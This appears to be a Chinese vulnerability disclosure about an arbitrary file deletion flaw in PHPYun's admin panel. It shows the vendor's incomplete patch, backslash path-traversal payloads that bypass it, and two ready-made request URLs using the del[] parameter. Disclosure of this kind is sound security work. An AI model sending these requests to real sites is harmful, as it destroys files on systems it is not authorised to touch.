PHPYun依然存在任意文件删除漏洞（后台触发）

### 简要描述： 27日补丁后，PHPYun依然存在任意文件删除漏洞 ### 详细说明： 12月27日，官方出了补丁： 在action.class.php的delfiledir函数中加入了替换../和./ ``` function delfiledir($delfiles){ $delfiles = str_replace("../","",$delfiles); $delfiles = str_replace("./","",$delfiles); $delfiles = "../".$delfiles; ``` 那么我们有别的方法可以绕过： （发现wooyun会把一个反斜杠变成两个…… \-->\\） 方法：改为 ``` ..\/..\/robots.txt ``` 或者直接 ``` ..\..\robots.txt ``` 地点一： 提交地址： ``` http://localhost/phpyun/admin/index.php?C=del&M=user_member&delsub=1&del[]=..\/..\/robots.txt ``` 通过修改del[]参数，可删除任意文件 地点二： 提交地址： ``` http://localhost/phpyun/admin/index.php?C=del&M=com_member&delsub=1&del[]=..\/..\/robots.txt ``` 通过修改del[]参数，可删除任意文件 问题文件分别是/admin/model/com_member.class.php 和 /admin/model/user_member.class.php [<img src="https://images.seebug.org/upload/201312/311905243877ce006010ebef8c5791a1f49155bc.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/311905243877ce006010ebef8c5791a1f49155bc.jpg) [<img src="https://images.seebug.org/upload/201312/311905367777ab2370e5d3dbb26f8fed4ac8cc2d.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/311905367777ab2370e5d3dbb26f8fed4ac8cc2d.jpg) ### 漏洞证明： 都在详细说明